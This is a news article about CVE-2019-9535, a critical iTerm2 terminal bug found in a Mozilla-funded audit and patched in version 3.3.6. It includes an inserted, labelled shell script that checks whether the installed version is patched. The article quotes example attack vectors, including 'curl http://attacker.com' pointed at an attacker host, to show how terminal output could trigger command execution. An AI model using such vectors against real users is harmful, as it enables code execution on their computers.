October 11, 2019 (updated 27 Jul 2022 9:00am)

Critical iTerm 2 Bug Patched after Mozilla-Backed Audit

"We expect the community will find many more creative examples..."

By CBR Staff Writer

A security audit funded by the Mozilla Open Source Support Program (MOSS) has discovered a critical security bug in iTerm2: a popular open source alternative to Apple’s Terminal — which provides a command line interface to control the UNIX-based operating system sitting below macOS.

Mozilla, iTerm2’s developers and Radically Open Security, the not-for-profit security company contracted to probe iTerm2’s security, have urged users to update the software, which has now been patched. The issue had been sitting in the open (hopefully) unnoticed for approximately seven years, they said.


iTerm2 is one of the most popular terminal emulators in the world, and frequently used by developers, Mozilla noted, saying: “MOSS selected iTerm2 for a security audit because it processes untrusted data and it is widely used, including by high-risk targets (like developers and system administrators).”

(Apple’s Terminal is widely looked down upon for lacking various functions. iTerm, by contrast, is seen as hugely feature-rich for power UNIX users).

Mozilla’s Tom Ritter said: “An attacker who can produce output to the terminal can, in many cases, execute commands on the user’s computer.

“Example attack vectors for this would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log.”

He added drily: “We expect the community will find many more creative examples.”

MOSS said: “Typically this vulnerability would require some degree of user interaction or trickery; but because it can be exploited via commands generally considered safe there is a high degree of concern about the potential impact.”


The vulnerability has been assigned CVE-2019-9535.

iTerm2’s team said they recommend a proactive immediate update by going to the iTerm2 menu and choosing Check for updates…

The fix is available in version 3.3.6.
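As an added example, not code from the article or from the iTerm2 project, the following POSIX shell check reads the installed iTerm2 version from its app bundle (assumed to be at the standard /Applications/iTerm.app path) and reports whether it is at or above the 3.3.6 release that carries the fix, which is useful when confirming the state of many machines without opening each one's update dialog:

```shell
#!/bin/sh
# Added check (not from the article or the iTerm2 project): report whether the
# installed iTerm2 is at or above 3.3.6, the release named as the fix for
# CVE-2019-9535.

FIXED_VERSION="3.3.6"
# Assumed standard install location; adjust if the bundle lives elsewhere.
ITERM_PLIST="/Applications/iTerm.app/Contents/Info.plist"

# version_ge A B: return 0 when dotted version A is at least B, 1 otherwise.
# Only the leading digits of each component are compared, so "3.3.6beta2" is
# treated as 3.3.6; missing components count as 0, so "3.3" equals 3.3.0.
version_ge() {
    a="$1"
    b="$2"
    while [ -n "$a" ] || [ -n "$b" ]; do
        a_head="${a%%.*}"
        b_head="${b%%.*}"
        # Drop the component just taken, or empty the string if it was the last.
        if [ "$a_head" = "$a" ]; then a=""; else a="${a#*.}"; fi
        if [ "$b_head" = "$b" ]; then b=""; else b="${b#*.}"; fi
        a_num="${a_head%%[!0-9]*}"
        b_num="${b_head%%[!0-9]*}"
        if [ "${a_num:-0}" -gt "${b_num:-0}" ]; then return 0; fi
        if [ "${a_num:-0}" -lt "${b_num:-0}" ]; then return 1; fi
    done
    return 0
}

# installed_iterm2_version: print CFBundleShortVersionString from the bundle
# using PlistBuddy, which ships with macOS.
installed_iterm2_version() {
    /usr/libexec/PlistBuddy -c "Print :CFBundleShortVersionString" "$ITERM_PLIST"
}

# check_iterm2: print a verdict; exit 0 if patched, 2 if not or unreadable.
check_iterm2() {
    installed="$(installed_iterm2_version)" || return 2
    if version_ge "$installed" "$FIXED_VERSION"; then
        echo "iTerm2 $installed is at or above $FIXED_VERSION: CVE-2019-9535 fix present"
    else
        echo "iTerm2 $installed is below $FIXED_VERSION: update via iTerm2 > Check for updates..."
        return 2
    fi
}

if [ -f "$ITERM_PLIST" ]; then
    check_iterm2
else
    echo "No iTerm2 bundle at $ITERM_PLIST; nothing to check"
fi
```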

Netherlands-based Radically Open Security is a not-for-profit computer security company legally established as a ‘Fiscaal Fondsenwervende Instelling’ (fiscal fundraising institution) in the Netherlands. This summer it donated 90 percent of its net profit to an internet charity, NLnet, that supports open source technology and open internet research and development.
